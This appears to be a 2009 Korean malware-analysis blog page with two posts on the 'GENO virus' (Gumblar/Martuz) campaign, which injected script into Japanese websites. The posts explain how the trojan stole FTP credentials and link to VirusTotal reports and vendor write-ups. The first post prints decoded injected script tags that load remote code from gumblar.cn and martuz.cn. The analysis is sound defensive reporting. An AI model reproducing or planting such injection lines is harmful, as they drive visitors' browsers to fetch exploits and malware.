태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'GENO 바이러스'에 해당되는 글 2건

  1. 2009.05.21 [Web Attack] 일본 사이트 스크립트 공격 (2)
  2. 2009.05.20 [JAPAN] GENO Virus? (2)
신종악성코드정보2009.05.21 17:37



일명 "GENO 바이러스"로 알려진 악의적인 스크립트 코드가 여러 일본 사이트에서 지속적으로 발견되고 있다.

처음 Injection 공격이 이루어진 것은 gumblar.cn 이며, 그 후 martuz.cn 으로 변경되었다.

사용자 삽입 이미지

1번 형식은 디코딩을 하면 다음과 같은 코드가 보여진다. (현재 연결 안됨)
<script src=//gumblar.cn/rss/?id=568825></script>

사용자 삽입 이미지

2번 형식은 디코딩을 하면 다음과 같은 코드가 보여진다. (현재 연결 안됨)
<script src=//martuz.cn/vid/?id=568825></script>

각각의 스크립트가 정상적으로 작동한 시점에는 PDF Exploit 과 SWF Exploit 코드가 추가적으로 설치되었고, 그 후에 최종적으로 EXE 악성코드가 설치된다.

http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

http://blog.naver.com/koheung/120068784986



Posted by viruslab
신종악성코드정보2009.05.20 15:23


일본쪽에서 4월 초부터 이슈화되고 있는 형태이다.

일명 GENO 바이러스라는 이름으로 알려져 있는데, 2009년 4월 초부터 이와 관련된 샘플들이 수집된 상태이고, 변종이 매우 다양하게 존재한다. 파일을 감염시키는 바이러스 기능은 존재하지 않으며, 트로이목마류로 분류할 수 있다.

추가적으로 sqlsodbc.chm 라는 파일이 설치되고, FTP 계정 정보 등을 저장하여 유출시킬 수 있다.


진단명으로는 Gadjo, Daonol, Kates 등으로 사용되고 있기도 하다.

사용자 삽입 이미지

가장 최근 3일 동안에 유포된 파일들만 정리하면 다음과 같고, 변종이 매우 다양하다.

5월 18일에 유포된 파일들은 다음과 같다. 이것이 일명 "GENO 바이러스"라고 이슈화 된 종류이다.

[PDF Exploit]
http://www.virustotal.com/analisis/6ccb86c5d064ee73b49ed284585273cf

[Flash Exploit]
http://www.virustotal.com/analisis/599eeb28cd2284aee7008ffab2dc9403

[Drop File]
http://www.virustotal.com/analisis/6100b8c3af29d13bd4c0b29a3a5038c3

 

 


http://gdata.co.jp/press/archives/2009/05/geno.htm

http://www.symantec.com/norton/security_response/writeup.jsp?docid=2009-051900-3410-99&tabid=2

http://geno.2ch.tc/

http://www31.atwiki.jp/doujin_vinfo/pages/1.html

http://blog.threatfire.com/2009/05/gumblar-grumbling.html

2009년 4월경부터 일본 기업의 홈페이지와 개인 사이트가 변조되었고, 특히 일본 PC 통신판매 사이트인 GENO(http://www.geno.co.jp/ http://www.geno-web.jp/) 가 알려지면서 총칭하여 불려지고 있다.

특히 일본 애니메이션과 만화 게임 등의 동인 사이트가 연쇄적으로 악성코드를 유포하면서 국내 매니아들 사이에서도 이슈화가 되고 있는 상황이다.

http://cafe.naver.com/suhmoonmidccc.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=200

http://memolog.blog.naver.com/rocksang11/358

 

Posted by viruslab